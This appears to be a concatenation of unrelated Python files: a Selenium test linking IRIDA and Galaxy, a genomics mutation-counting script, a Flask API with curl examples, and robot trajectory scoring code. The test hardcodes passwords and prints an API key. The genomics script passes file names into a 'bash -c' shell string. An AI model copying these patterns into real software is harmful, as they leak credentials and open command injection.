driver.find_element_by_name("create").click()
try:
driver.get(self.GALAXY_URL)
driver.find_element_by_link_text("Login or Register").click()
driver.find_element_by_name("login").send_keys(self.EMAIL)
driver.find_element_by_name("password").send_keys("Password1")
driver.find_element_by_name("login").click()
except NoSuchElementException:
pass
def configure_galaxy_api_key(self, driver):
"""Make a new Galaxy admin API key and configure the tool to use it"""
gal = galaxy.GalaxyInstance(self.GALAXY_URL,
email=self.EMAIL,
password=self.GALAXY_PASSWORD)
self.configure_tool('Galaxy', 'admin_key', gal.key)
print('key:' + gal.key)
def configure_tool(self, section, option, value):
"""Write tool configuration data"""
config = configparser.ConfigParser()
config.read(self.CONFIG_PATH)
config.set(section, option, value)
with open(self.CONFIG_PATH, 'w') as config_file:
config.write(config_file)
def register_irida(self, driver):
"""Register with IRIDA if neccessary, and then log in"""
driver.get(self.IRIDA_URL)
self.login_irida(driver, 'admin', 'password1')
# Set a new password if necessary
try:
driver.find_element_by_name(
"password").send_keys(self.IRIDA_PASSWORD)
driver.find_element_by_name(
"confirmPassword").send_keys(self.IRIDA_PASSWORD)
driver.find_element_by_xpath("//button[@type='submit']").click()
except NoSuchElementException:
self.login_irida(driver, self.IRIDA_USER, self.IRIDA_PASSWORD)
def login_irida(self, driver, username, password):
"""Log in to IRIDA (assumes the login page is opened by the driver)"""
try:
driver.find_element_by_name("username").send_keys(username)
driver.find_element_by_name(
"password").send_keys(password)
driver.find_element_by_xpath("//button[@type='submit']").click()
except NoSuchElementException:
# If already logged in
pass
def add_irida_client_auth_code(self, driver):
driver.get(self.IRIDA_URL + '/clients/create')
driver.find_element_by_id("clientId").send_keys(
self.IRIDA_AUTH_CODE_ID)
driver.find_element_by_id('authorizedGrantTypes').click()
driver.find_element_by_xpath(
"//*[contains(text(), 'authorization_code')]").click()
driver.find_element_by_name("registeredRedirectUri").send_keys(self.IRIDA_REDIRECT_URI)
driver.find_element_by_id("scope_auto_read").click()
driver.find_element_by_id("create-client-submit").click()
def add_irida_client_password(self, driver):
driver.get(self.IRIDA_URL + '/clients/create')
driver.find_element_by_id("clientId").send_keys(self.IRIDA_PASSWORD_ID)
driver.find_element_by_id("scope_write").click()
driver.find_element_by_id("create-client-submit").click()
def get_irida_oauth(self, driver):
secret = self.get_irida_secret(driver, self.IRIDA_PASSWORD_ID)
client = LegacyApplicationClient(self.IRIDA_PASSWORD_ID)
irida_oauth = OAuth2Session(client=client)
irida_oauth.fetch_token(
self.IRIDA_TOKEN_ENDPOINT,
username=self.IRIDA_USER,
password=self.IRIDA_PASSWORD,
client_secret=secret)
return irida_oauth
def get_irida_secret(self, driver, client_id):
"""Get an IRIDA client's secret given its client ID """
driver.get(self.IRIDA_URL + '/clients')
driver.find_element_by_xpath(
"//*[contains(text(), '" + client_id + "')]").click()
secret = driver.find_element_by_id(
'client-secret').get_attribute('textContent')
return secret
def configure_irida_client_secret(self, driver):
"""Configure the client secret for the tool"""
secret = self.get_irida_secret(driver, self.IRIDA_AUTH_CODE_ID)
# It is assumed that the tests are being run from the repo's tool
# directory:
self.configure_tool('IRIDA', 'client_secret', secret)
def get_href(self, response, rel):
"""From a Requests response from IRIDA, get a href given a rel"""
links = response.json()['resource']['links']
href = next(link['href'] for link in links if link['rel'] == rel)
return href
def test_project_samples_import_single_end(self, setup_irida, setup_galaxy,
driver, tmpdir):
"""Verify that sequence files can be imported from IRIDA to Galaxy"""
irida = setup_irida
project_name = 'ImportProjectSamples'
project = irida.post(self.IRIDA_PROJECTS,
json={'name': project_name})
samples = self.get_href(project, 'project/samples')
sample1 = irida.post(samples, json={'sampleName': 'PS_Sample1',
'sequencerSampleId': 'PS_1'})
sequences1 = self.get_href(sample1, 'sample/sequenceFiles')
# Pytest manages the temporary directory
seq1 = tmpdir.join("seq1.fastq")
seq1.write(self.FASTQ_CONTENTS)
irida.post(sequences1, files={'file': open(str(seq1),
'rb')})
seq2 = tmpdir.join("seq2.fastq")
seq2.write(self.FASTQ_CONTENTS)
irida.post(sequences1, files={'file': open(str(seq2),
'rb')})
sample2 = irida.post(samples, json={'sampleName': 'PS_Sample2',
'sequencerSampleId': 'PS_2'})
sequences2 = self.get_href(sample2, 'sample/sequenceFiles')
seq3 = tmpdir.join("seq3.fastq")
seq3.write(self.FASTQ_CONTENTS)
irida.post(sequences2, files={'file': open(str(seq3),
'rb')})
# Export to Galaxy using the button on the dropdown menu
driver.get(self.GALAXY_URL)
history_panel = driver.find_element_by_id('current-history-panel')
initially_succeeded = len(history_panel.find_elements_by_class_name(
'state-ok'))
driver.find_element_by_xpath("//div[@id='Get Data']/a[span[contains(text(), 'Get Data')]]").click()
driver.find_element_by_xpath("//a[contains(@class, 'irida_import')]").click()
# Sometimes a login is required
try:
self.login_irida(driver, self.IRIDA_USER, self.IRIDA_PASSWORD)
except NoSuchElementException:
pass
# Pick the last matching project on this page
driver.find_elements_by_link_text(project_name)[-1].click()
# These checkbox elements cannot be clicked directly
# Using IDs would complicate running the tests without restarting IRIDA
stale = True
timeout = 0
while stale:
try:
checkboxes = driver.find_elements_by_xpath(
"//table[contains(@id, 'samplesTable')]/tbody/tr/td[1]/input[@type='checkbox']")
checkboxes[0].click()
checkboxes[1].click()
stale = False
except (StaleElementReferenceException, NoSuchElementException):
time.sleep(1)
timeout += 1
if timeout == 60:
raise
driver.find_element_by_id("cart-add-btn").click()
driver.find_element_by_id("cart-show-btn").click()
email_input = driver.find_element_by_xpath("//form[contains(@class, 'ant-form')]//input[@type='text']")
email_input.clear()
email_input.send_keys(self.EMAIL)
# Click "Export Samples to Galaxy" button
driver.find_element_by_xpath("//button[span[text()='Export Samples to Galaxy']]").click()
WebDriverWait(driver, self.WAIT).until(
EC.presence_of_element_located((By.ID, 'current-history-panel'))
)
time.sleep(120) # Wait for import to complete
history_panel = driver.find_element_by_id('current-history-panel')
succeeded = len(history_panel.find_elements_by_class_name('state-ok'))
assert succeeded - initially_succeeded > 0, \
"Import did not complete successfully"
| 18,797 | 6,054 |
## This code was developed and authored by Les Klimczak, Ph.D.
## Unauthorized commercial reuse of the code and removal of this notice
## are prohibited.
## This research was supported by the Intramural Research Program of the NIH,
## National Institute of Environmental Health Sciences.
import os, re, sys, copy, numpy, datetime, __builtin__
FILESDIR = sys.argv[1]
execfile(sys.argv[1] + "findMotifs.py")
time40 = datetime.datetime.now()
def which(tf):
return filter(lambda x: tf[x], range(len(tf)))
#def all(tf):
# return reduce(lambda x, y: x&y, tf)
def duplicated(list):
seen = []
duplicated = []
for el in list:
if el in seen:
duplicated.append(True)
else:
duplicated.append(False)
seen.append(el)
return duplicated
def ifelse(test, yes, no):
if test:
return yes
else:
return no
OLDEXT = "_anz4.txt"
BATCH = True
BATCH = False
#CLUSTERANZ = True
CLUSTERANZ = False
if CLUSTERANZ:
OLDEXT = "_cluster.txt"
ORIGDIR = "/data/PCAWG_12oct_passonly/MAF_2583/histology_split/A3A_A3B/res_ytCa/"
motifString = re.sub('.*/res', '', ORIGDIR)[:-1]
sumTitles = ["Sample","A_T_coord_clusters", "G_C_coord_clusters", "Non_coord_clusters", "clusters","mutations", "complex","insertions", "deletions", "indels", "substitutions", "bases"]
substTo = {'A':("T","G","C"),'T':("A","C","G"),'G':("C","T","A"),'C':("G","A","T")}
colTitles = []
for title in findTitles:
if (len(title)==1):
mutBase = title
else:
mutBase = title[which([x<90 for x in [ord(x) for x in title]])[0]]
for base in substTo[mutBase]:
if (base==mutBase):
continue
colTitle = title + "_to_" + base
colTitles.append(colTitle)
colTitles.extend((title, title.lower()))
if (len(title)>1):
colTitles.extend((title + "_per_mut", title + "_per_" + mutBase, title.lower() + "_per_" + mutBase.lower(), "enrich_" + title, "freq_" + title, "reliable>=30"))
headers = sumTitles + colTitles
numCols = len(headers)
totals = [0] * numCols
numFixedCols = 32
def newCounter(type, subtype, sumTitle, sumSubtitle, typeColumn, typeValue, subtypeColumn, subtypeValue, subtypeComparison):
type = type
subtype = subtype
sumTitle = sumTitle
sumSubtitle = sumSubtitle
typeColumn = typeColumn
typeValue = typeValue
if (typeValue[1:2]==","):
typeValue = typeValue.split(",")
subtypeColumn = subtypeColumn
subtypeValue = subtypeValue
subtypeComparison = subtypeComparison
if ((subtypeComparison=="equal") or (subtypeComparison=="greater")):
subtypeValue = int(subtypeValue)
typeField = [0]
subtypeField = [0]
# 07/15/16 counters replaced with variants
variants = [{}]
complex = [{}]
clusters = [{}]
mutations = [0]
mutList = [{}]
baseList = [{}]
baseCountList = [{}]
totals = [0] * numCols
output = [""]
def initOutput(inputPref):
if (type=='99'):
typeString = "_" + sumSubtitle
outputFile = inputPref + "_sum" + typeString + ".txt"
else:
typeString = "%02d" % int(type)
outputFile = inputPref + "_sum" + typeString + subtype + ".txt"
#if (file.exists(outputFile)) next
output[0] = open(outputFile, "w")
if (type!='99'):
output[0].write("#" + sumTitle + " " + sumSubtitle + "\n")
output[0].write('\t'.join(headers) + "\n")
def closeOutput():
output[0].close()
def initFieldNames(fieldNames):
typeField[0] = which([x==typeColumn for x in fieldNames])
if (typeField[0]):
typeField[0] = typeField[0][0]
subtypeField[0] = which([x==subtypeColumn for x in fieldNames])
if (subtypeField[0]):
subtypeField[0] = subtypeField[0][0]
#print type, subtype, typeColumn, typeField[0], subtypeField[0]
def initCounters(mutList0, baseList0, baseCountList0):
variants[0] = {}
complex[0] = {}
clusters[0] = {}
mutations[0] = 0
mutList[0] = copy.deepcopy(mutList0)
baseList[0] = copy.deepcopy(baseList0)
baseCountList[0] = copy.deepcopy(baseCountList0)
def count(fields):
if (sumTitle!="All Mutations"):
#if (not any([x==typeValue for x in fields])):
if (__builtin__.type(typeValue) is list):
if (not any([x==fields[typeField[0]] for x in typeValue])):
return
else:
if (not fields[typeField[0]]==typeValue):
return
if subtypeField[0]!=[]:
if ((subtypeComparison=="equal") or (subtypeComparison=="greater")):
subtypeFieldValue = int(fields[subtypeField[0]])
else:
subtypeFieldValue = fields[subtypeField[0]]
if (not compare(subtypeFieldValue, subtypeValue, subtypeComparison)):
return
#if (True):
#if (type=="10"):
#if ((type!="10")&(fields[typeField]!="N")) {
# print lnum, type, subtype, subtypeColumn, subtypeField[0]
# typeField, subtypeField
#}
if (not variants[0].has_key(fields[VARIANT_TYPE_FIELD]) and (fields[COMPLEX_ID_FIELD]=="")):
(variants[0])[fields[VARIANT_TYPE_FIELD]] = 1
else:
if (fields[COMPLEX_ID_FIELD]==""):
(variants[0])[fields[VARIANT_TYPE_FIELD]] = (variants[0])[fields[VARIANT_TYPE_FIELD]] + 1
if (fields[CLUSTER_ID_FIELD]!=""):
(clusters[0])[fields[CLUSTER_ID_FIELD]] = fields[CLUSTER_COORD_FIELD]
if (fields[COMPLEX_ID_FIELD]!=""):
(complex[0])[fields[COMPLEX_ID_FIELD]] = fields[COMPLEX_ID_FIELD]
#cat("c", fields[COMPLEX_ID_FIELD], "c")
# 04/15/14 change to all non-complex rows
if (fields[COMPLEX_ID_FIELD]==""):
mutations[0] = mutations[0]+1
if ((fields[COMPLEX_ID_FIELD]=="") and (fields[VARIANT_TYPE_FIELD]=="SNP")):
# 04/15/14 change to all non-complex rows
#mutations <- mutations+1
# for (title in findTitles[as.logical(as.numeric(fields[fieldNames %in% findTitles]))]) {
for title in [findTitles[x] for x in which([bool(x) for x in [int(x) for x in [fields[x] for x in which([x in findTitles for x in fieldNames])]]])]:
mutationCount = (mutList[0])[title][fields[TUMOR_SEQ_ALLELE2_FIELD]]
(mutList[0])[title][fields[TUMOR_SEQ_ALLELE2_FIELD]] = mutationCount + 1
#baseCounts <- as.numeric(fields[fieldNames %in% countTitles])
baseCounts = [int(x) for x in [fields[x] for x in uniqueFieldNumbers]]
for i in range(len(baseCounts)):
(baseCountList[0])[uniqueFieldNames[i]] = (baseCountList[0])[uniqueFieldNames[i]] + baseCounts[i]
else:
sys.stdout.write("X")
def writeSampleSum():
print " writing sample in row", lnum
complex[0] = len((complex[0]).keys())
# translated ifelse won't work b/c it's trying to evaluate the False option
if (variants[0].has_key("INS")):
insertions = variants[0]["INS"]
else:
insertions = 0
if (variants[0].has_key("DEL")):
deletions = variants[0]["DEL"]
else:
deletions = 0
if (variants[0].has_key("SNP")):
substitutions = variants[0]["SNP"]
else:
substitutions = 0
# 04/15/14 change to all rows
#mutations <- mutations + complex + insertions + deletions
mutations[0] = mutations[0] + complex[0]
coordBases = {'A':0, 'T':0, 'G':0, 'C':0, 'N':0}
# iterates over keys, not values like R
for key in clusters[0]:
coordBases[clusters[0][key]] = coordBases[clusters[0][key]] + 1
genCounts = (coordBases["A"] + coordBases["T"], coordBases["G"] + coordBases["C"], coordBases["N"], len(clusters[0].keys()), mutations[0], complex[0], insertions, deletions, insertions+deletions, substitutions, substitutions*41)
#print genCounts
substCounts = [sampleID]
substCounts.extend(genCounts)
for title in findTitles:
motifCounts = []
#print(title)
if (len(title)==1):
mutBase = title
else:
mutBase = title[which([x<90 for x in [ord(x) for x in title]])[0]]
mutBaseSum = 0
#for (base in c("A", "T", "G", "C")) {
for base in substTo[mutBase]:
if (base==mutBase):
continue
baseSubstCount = mutList[0][title][base]
motifCounts.extend([baseSubstCount])
mutBaseSum = mutBaseSum + baseSubstCount
motifCountName = title.lower() + "_counts"
totMotifCount = baseCountList[0][motifCountName]
motifCounts.extend([mutBaseSum, totMotifCount])
if (len(title)==1):
baseList[0][mutBase] = mutBaseSum
else:
mutMotifperMut = numpy.float64(mutBaseSum)/baseList[0][mutBase]
totMotifperBase = numpy.float64(totMotifCount)/baseCountList[0][mutBase.lower() + "_counts"]
reliable = (mutBaseSum >= 30)*1
#print mutations[0], mutBaseSum, totMotifperBase, totMotifCount
motifCounts.extend((numpy.float64(mutBaseSum)/mutations[0], mutMotifperMut, totMotifperBase, numpy.float64(mutMotifperMut)/totMotifperBase, numpy.float64(mutBaseSum)/totMotifCount, reliable))
#print(motifCounts)
substCounts.extend(motifCounts)
totals[1:(numCols)] = [x+y for x,y in zip(totals[1:(numCols)], (substCounts[1:(numCols)]))]
outLine = substCounts[0] + '\t' + '\t'.join([x.__str__() for x in substCounts[1:(numCols)]]) + "\n"
output[0].write(outLine.replace('nan', 'NaN'))
#cat(substCounts, "\n")
fixedCols = 32
def writeTotals():
t = 0
for title in findTitles:
if (len(title)==1):
continue
else:
mutBase = title[which([x<90 for x in [ord(x) for x in title]])[0]]
colOffset = fixedCols + t*11
titleTotals = [0]*10
titleTotals[0:5] = totals[(colOffset):(colOffset+5)]
titleTotals[5] = numpy.float64(titleTotals[3])/totals[which([x=="mutations" for x in headers])[0]]
titleTotals[6] = numpy.float64(titleTotals[3])/totals[which([x==mutBase for x in headers])[0]]
titleTotals[7] = numpy.float64(titleTotals[4])/totals[which([x==mutBase.lower() for x in headers])[0]]
titleTotals[8] = numpy.float64(titleTotals[6])/titleTotals[7]
titleTotals[9] = numpy.float64(titleTotals[3])/titleTotals[4]
totals[(colOffset):(colOffset+10)] = titleTotals
t = t + 1
totals[0] = "Totals"
outLine = "\t".join([x.__str__() for x in totals]) + "\n"
output[0].write(outLine.replace('nan', 'NaN'))
totals[0:(numCols)] = [0] * numCols
def getValues():
return (type, subtype, sumTitle, typeValue)
return {'type':type, 'getValues':getValues, 'initOutput':initOutput, 'closeOutput':closeOutput, 'initFieldNames':initFieldNames, 'initCounters':initCounters, 'count':count, 'mutList':mutList, 'writeSampleSum':writeSampleSum, 'writeTotals':writeTotals}
countersList = []
#countersList[2]['getValues']()
rulesFile = "SummaryRulesIntegr1.txt"
# special 12/13/17
#rulesFile = "SummaryRules5d.txt"
#rulesTable = read.table(rulesFile, header=TRUE, stringsAsFactors=FALSE, sep="\t")
rInput = open(rulesFile, "r")
line = rInput.readline()
# switch(type, equal=x==y, greater=x>y, isNonBlank=(x!=""), isAny=TRUE)
def compare(x, y, type):
return {'equal':x==y, 'greater':x>y, 'isNonBlank':x!="", 'isAny':True}[type]
sumCount = 0
while (True):
line = rInput.readline().rstrip('\r\n')
if (not line):
break
fields = line.split("\t")
countersList.append(newCounter(fields[0], fields[1], fields[2], fields[3], fields[4], fields[5], fields[6], fields[7], fields[8]))
sumCount = sumCount + 1
rInput.close()
files = os.listdir(FILESDIR)
#files = [os.listdir(FILESDIR)[3]]
#file = "2014_Fredriksson_HNSC_27_WGS_mutations_adjusted_anz1_NOrepeats_sorted_anz4.txt"
for file in files:
if (file[-len(OLDEXT):]!=OLDEXT):
continue
if (BATCH):
batchNames = ("BLCA", "BRCA", "HNSC", "LUAD", "LUSC")
batchSubset = 2
if (file.split("_")[2] not in batchNames[batchSubset]):
continue
print(file)
#print("\n" + file + "\n")
inputFile = FILESDIR + file
inputPref = inputFile[:-len(OLDEXT)]
if CLUSTERANZ:
sys.stderr.write("Using clusterDEF file\n")
#origAnz4 = ORIGDIR + re.sub('_anz2.*', '', file) + '_anz4.txt'
origAnz4 = ORIGDIR + re.sub('_anz2.*', '', file) + motifString + '_anz4.txt'
inputPref = inputPref + motifString
#input = os.popen('cut -f1-77 ' + origAnz4)
# 68 - last anz4 col; 2 - first clusterDef col; 9 - first+9-1
#input = os.popen('bash -c "paste <(cut -f1-68 ' + origAnz4 + ')' + ' <(cut -f2-9 ' + inputFile + ')"')
# for tCw
#input = os.popen('bash -c "paste <(cut -f1-69 ' + origAnz4 + ')' + ' <(cut -f3-11 ' + inputFile + ')"')
# for tCa: 62, rtCa: 63
input = os.popen('bash -c "paste <(cut -f1-63 ' + origAnz4 + ')' + ' <(cut -f3-11 ' + inputFile + ')"')
else:
input = open(inputFile, "r")
line = input.readline()
firstChar = line[:1]
while firstChar=="#":
line = input.readline()
firstChar = line[:1]
fieldNames = line[:-1].split("\t")
VARIANT_TYPE_FIELD = which(map(lambda(x): x=='Variant_Type', fieldNames))[0]
TUMOR_SEQ_ALLELE2_FIELD = which(map(lambda(x): x=='Tumor_Seq_Allele2', fieldNames))[0]
COMPLEX_ID_FIELD = which(map(lambda(x): x=='Complex_ID', fieldNames))[0]
CLUSTER_ID_FIELD = which(map(lambda(x): x=='Dataset_Cluster_ID', fieldNames))[0]
CLUSTER_COORD_FIELD = which(map(lambda(x): x=='Cluster_Coordination', fieldNames))[0]
INPUT_SAMPLE_FIELD = which(map(lambda(x): x=='Tumor_Sample_Barcode', fieldNames))[0]
#uniqueFieldNumbers <- (fieldNames %in% countTitles) & !duplicated(fieldNames)
#uniqueFieldNames <- fieldNames[uniqueFieldNumbers]
tf1 = map(lambda x: x in countTitles, fieldNames)
tf2 = map(lambda x: not x, duplicated(fieldNames))
uniqueFieldNumbers = which(map(lambda x: tf1[x] and tf2[x], range(len(fieldNames))))
uniqueFieldNames = map(lambda(x): fieldNames[x], uniqueFieldNumbers)
mutList = dict(zip(findTitles, [0]*len(findTitles)))
baseList = {'A': 0, 'T':0, 'G':0, 'C':0}
for key in mutList.keys():
mutList[key] = dict(baseList)
baseCountList = dict(zip(uniqueFieldNames, [0]*len(uniqueFieldNames)))
print("Initializing...")
for sumNum in range(sumCount):
countersList[sumNum]['initOutput'](inputPref)
countersList[sumNum]['initFieldNames'](fieldNames)
countersList[sumNum]['initCounters'](mutList,baseList,baseCountList)
print("Counting...")
sampleID = ""
firstSample = True
lnum = 0
while (True):
#while (lnum<1000):
line = input.readline()
if (not line):
for sumNum in range(sumCount):
countersList[sumNum]['writeSampleSum']()
countersList[sumNum]['writeTotals']()
countersList[sumNum]['closeOutput']()
print "End: not line"
break
lnum = lnum+1
if (lnum%1000==0):
sys.stdout.write('.')
fields = line.split("\t")
if (all(map(lambda(x): x=="", fields))):
for sumNum in range(sumCount):
countersList[sumNum]['writeSampleSum']()
countersList[sumNum]['writeTotals']()
countersList[sumNum]['closeOutput']()
print "End: empty fields"
break
if (fields[INPUT_SAMPLE_FIELD]!=sampleID):
if (not firstSample):
for sumNum in range(sumCount):
print("Writing %d" % sumNum)
countersList[sumNum]['writeSampleSum']()
countersList[sumNum]['initCounters'](mutList,baseList,baseCountList)
firstSample = False
sampleID = fields[INPUT_SAMPLE_FIELD]
print(sampleID)
for sumNum in range(sumCount):
countersList[sumNum]['count'](fields)
input.close()
print
for sumNum in range(sumCount):
print countersList[sumNum]['getValues']()
os.remove(sys.argv[1] + "findMotifs.py")
time50 = datetime.datetime.now()
print(time50 - time40)
| 14,822 | 6,334 |
from flask_restful import Resource
from flask import jsonify, request
from app.puppenc import api, db, app, auth, PuppencResource
from app.decorators import *
from app.environments.models import Environment
from app.environments.schema import EnvironmentSchema
class Environments(PuppencResource):
def __init__(self):
self.environment_schema = EnvironmentSchema()
self.environments_schema = EnvironmentSchema(many=True)
@auth.login_required
@get_item(Environment)
def get(self, id=None):
"""
@api {get} /environments Get all environments
@apiName get_environments
@apiGroup Environments
@apiVersion 1.0.0
@apiPermission user
@apiParam {String} [limit=10] (query parameter) Objects per page to display. Use limit=0 for disabling limit
@apiParam {String} [page=1] (query parameter) Current page
@apiParam {String} [filter] (query parameter) Filter on name parameter (use * for searching any strings. Ex: *maclass*)
@apiSuccess {Number} id The environment's id
@apiSuccess {String} name The environment's name
@apiSuccess {Array} nodes The environment's nodes (by id)
@apiSuccess {Datetime} insert_date The environment's inserted date
@apiSuccess {Datetime} update_date The environment's updated date
@apiSuccess {Datetime} delete_date The environment's deleted date
@apiExample {curl} Example usage :
curl -X GET -u user:pwd http://127.0.0.1:5000/api/v1/environments
@apiSuccessExample {json} Success-Response:
HTTP/1.0 200 OK
[
{
"delete_date": null,
"id": 1,
"insert_date": "2017-04-11T13:56:03+00:00",
"name": "stable",
"nodes": [
104,
2582,
2588
],
"update_date": null
},
{
"delete_date": null,
"id": 2,
"insert_date": "2017-04-11T13:56:04+00:00",
"name": "staging",
"nodes": [
8,
34,
42
],
"update_date": null
}
]
"""
"""
@api {get} /environments/:id Get a single environment
@apiName get_environment
@apiGroup Environments
@apiVersion 1.0.0
@apiPermission user
@apiParam {Number} id (uri parameter) The environment's id.
@apiSuccess {Number} id The environment's id.
@apiSuccess {String} name The environment's name.
@apiSuccess {Array} nodes The environment's nodes (by id)
@apiSuccess {Datetime} insert_date The environment's inserted date
@apiSuccess {Datetime} update_date The environment's updated date
@apiSuccess {Datetime} delete_date The environment's deleted date
@apiExample {curl} Example usage :
curl -X GET -u user:pwd http://127.0.0.1:5000/api/v1/environments/1
@apiSuccessExample {json} Success-Response:
HTTP/1.0 200 OK
{
"delete_date": null,
"id": 2,
"insert_date": "2017-04-11T13:56:03+00:00",
"name": "my_environment",
"nodes": [
1498,
2817,
2818
],
"update_date": null
}
"""
if not id:
return self.environments_schema.jsonify(g.obj_info)
else:
return self.environment_schema.jsonify(g.obj_info)
@auth.login_required
@body_is_valid
@is_unique_item(Environment)
@post_item(Environment)
def post(self):
"""
@api {post} /environments Add a new environment
@apiName add_environment
@apiGroup Environments
@apiVersion 1.0.0
@apiPermission user
@apiParam {String} name (json document) The environment's name.
@apiSuccess {Number} id The environment's id.
@apiExample {curl} Example usage :
curl -X POST -H "Content-Type: application/json" \
-d '{ "name": "my_new_environment" }' \
http://127.0.0.1:5000/api/v1/environments
@apiSuccessExample {json} Success-Response:
HTTP/1.0 200 OK
{
"227": {
"name": "my_new_environment"
}
}
"""
pass
@auth.login_required
@body_is_valid
@is_unique_item(Environment)
@get_item(Environment)
@edit_item(Environment)
def put(self, id=None):
"""
@api {put} /environments/:id Edit an existing environment
@apiName edit_environment
@apiGroup Environments
@apiVersion 1.0.0
@apiPermission user
@apiParam {String} name (uri parameter) The environment's id
@apiParam {String} name (json document) The new environment's name
@apiSuccess {Number} success True if success
@apiSuccess {Number} message A information message
@apiExample {curl} Example usage :
curl -X PUT -H "Content-Type: application/json" \
-d '{ "name": "my_new_environment" }' \
http://127.0.0.1:5000/api/v1/environments/:id
@apiSuccessExample {json} Success-Response:
HTTP/1.0 200 OK
{
"message": "successfully modified",
"success": true
}
"""
pass
@auth.login_required
@get_item(Environment)
@delete_item(Environment)
def delete(self, id):
"""
@api {delete} /environments/:id Delete a single environment
@apiName rm_hostgorup
@apiGroup Environments
@apiVersion 1.0.0
@apiPermission user
@apiParam {Number} id (uri parameter) The environment's id.
@apiSuccess {Boolean} success Success (True if ok).
@apiSuccess {String} message A success or error message.
@apiExample {curl} Example usage :
curl -X DELETE http://127.0.0.1:5000/api/v1/environments/:id
@apiSuccessExample {json} Success-Response:
HTTP/1.0 200 OK
{
"message": "<Environment 'my_new_environment'> deleted",
"success": true
}
"""
pass
| 6,757 | 1,924 |
import numpy as np
from shapely.geometry import Point, LineString, Polygon
from smallest_enclosing_circle import make_circle
from itertools import groupby
from operator import itemgetter
# def human_feedback(x, human_cluster, point_cluster, obstacle):
# # human are inside the polygon
# score = 0
# index = set()
# nx = np.shape(x)[0]//2
#
# for num, polygon in human_cluster.items():
# point = []
# cluster = Polygon(polygon)
# for i in range(nx - 1):
# # whether the line segment crosses the cluster(polygon)
# if LineString([Point((x[i], x[i+nx])), Point(x[i+1], x[i+1+nx])]).intersects(cluster):
# point.append([(x[i], x[i+nx]), (x[i+1], x[i+1+nx])])
# index.add(i)
# index.add(i+1)
# if point:
# score += get_score_from_human(point, point_cluster[num])
# # obstacle avoidance
# for num, obs in obstacle.items():
# for i in range(nx - 1):
# # whether the line segment crosses the (obstacle)
# if LineString([Point((x[i], x[i + nx])), Point(x[i + 1], x[i + 1 + nx])]).intersects(obs):
# score += 1
# index.add(i)
# index.add(i+1)
# # the length of the trajectory
# dist = np.sum([np.linalg.norm([x[i] - x[i + 1], x[i + nx] - x[i + 1 + nx]]) for i in range(nx - 1)])
# score += dist
#
# # index
# index_group = []
# index = list(index)
# index.sort()
# for k, g in groupby(enumerate(index), lambda ix: ix[0] - ix[1]):
# index_group.append(list(map(itemgetter(1), g)))
# expand_index = set([j for i in index_group for j in i])
# for group in index_group:
# num = np.random.randint(0, 3)
# extra = [group[0]-k for k in range(1, num+1) if group[0]-k > 0] + \
# [group[-1]+k for k in range(1, num+1) if group[-1]+k < nx]
# expand_index.update(set(extra))
# return score, dist, list(expand_index)
#
#
# def get_score(point, polygon):
# """
# the distance of the center of polygon to the line segment of a trajectory
# :param point:
# :param polygon:
# :return:
# """
# rho = 1
# cx, cy, r = make_circle(polygon)
# score = 0
# for p in point:
# d = np.abs((p[1][1]-p[0][1])*cx - (p[1][0]-p[0][0])*cy + p[1][0]*p[0][1] - p[1][1]*p[0][0]) / \
# np.sqrt((p[1][1]-p[0][1])**2 + (p[1][0]-p[0][0])**2)
# score += rho/d[0]
# return score
#
#
# def get_score_from_human(point, point_cluster):
# score = 0
# radius = 0.5
# for human in point_cluster:
# cx = human[0]
# cy = human[1]
# for p in point:
# d = np.abs((p[1][1] - p[0][1]) * cx - (p[1][0] - p[0][0]) * cy + p[1][0] * p[0][1] - p[1][1] * p[0][0]) / \
# np.sqrt((p[1][1] - p[0][1]) ** 2 + (p[1][0] - p[0][0]) ** 2)
# if d <= radius:
# score += 1
# return score
def human_feedback1(x0, x, human, obstacle, human_scale):
# human stand randomly
score = 0
index = set()
nx = np.shape(x)[0]//2
# complaint
for i in range(nx - 1):
p = [(x[i], x[i + nx]), (x[i + 1], x[i + 1 + nx])]
for ind, h in enumerate(human):
cx = h[0]
cy = h[1]
# decide the shortest distance of a point to a line segment
# https://math.stackexchange.com/questions/2248617/shortest-distance-between-a-point-and-a-line-segment
t = - ((p[0][0] - cx) * (p[1][0] - p[0][0]) + (p[0][1] - cy) * (p[1][1] - p[0][1])) / \
((p[1][0] - p[0][0]) ** 2 + (p[1][1] - p[0][1]) ** 2)
if 0 <= t <= 1:
d = np.abs((p[1][1] - p[0][1]) * cx - (p[1][0] - p[0][0]) * cy + p[1][0] * p[0][1] - p[1][1] * p[0][0]) / \
np.sqrt((p[1][1] - p[0][1]) ** 2 + (p[1][0] - p[0][0]) ** 2)
else:
d1 = (p[0][0] - cx) ** 2 + (p[0][1] - cy) ** 2
d2 = (p[1][0] - cx) ** 2 + (p[1][1] - cy) ** 2
d = np.sqrt(d1) if d1 <= d2 else np.sqrt(d2)
if d <= human_scale[ind]:
score += 1
index.add(i)
index.add(i+1)
# obstacle avoidance
# for num, poly in obstacle.items():
# obs = Polygon(poly)
# for i in range(nx - 1):
# # whether the line segment crosses the (obstacle)
# if LineString([Point((x[i], x[i + nx])), Point(x[i + 1], x[i + 1 + nx])]).intersects(obs):
# score += 1
# index.add(i)
# index.add(i+1)
# complaints inludes human complaints and obstacles
complaint = score
# the length of the trajectory
dist = 0 # np.sum([np.linalg.norm([x[i] - x[i + 1], x[i + nx] - x[i + 1 + nx]]) for i in range(nx - 1)])
# diff = x - x0
# dist = dist + np.sum([np.linalg.norm([(diff[i], diff[i + nx])]) for i in range(nx)])
dist = dist + np.linalg.norm(x-x0)
dist = dist
score = (score * 10 + dist)
# indices of waypoints need to be perturbed
index_group = []
index = list(index)
index.sort()
for k, g in groupby(enumerate(index), lambda ix: ix[0] - ix[1]):
index_group.append(list(map(itemgetter(1), g)))
expand_index = set([j for i in index_group for j in i])
for group in index_group:
num = np.random.randint(0, 1)
extra = [group[0]-k for k in range(1, num+1) if group[0]-k > 0] + \
[group[-1]+k for k in range(1, num+1) if group[-1]+k < nx]
expand_index.update(set(extra))
return score, complaint, dist, list(expand_index)
| 5,675 | 2,226 |
#!/usr/bin/python
# coding=UTF-8
#
# METS Validator Portal
# Copyright (C) 2017
# All rights reserved.
#
# This code is distributed under the terms of the GNU General Public
# License, Version 3. See the text file "COPYING" for further details
# about the terms of this license.
class Path:
#URL
path = ""
def main():
# test code
pass
# this means that if this script is executed, then
# main() will be executed
if __name__ == '__main__':
main()
| 470 | 153 |
#!/usr/bin/env python
import torch.utils.data
import numpy as np
import random
import time
import matplotlib.pyplot as plt
from tkinter import _flatten
from function import plot_clas_loss, pre_processing
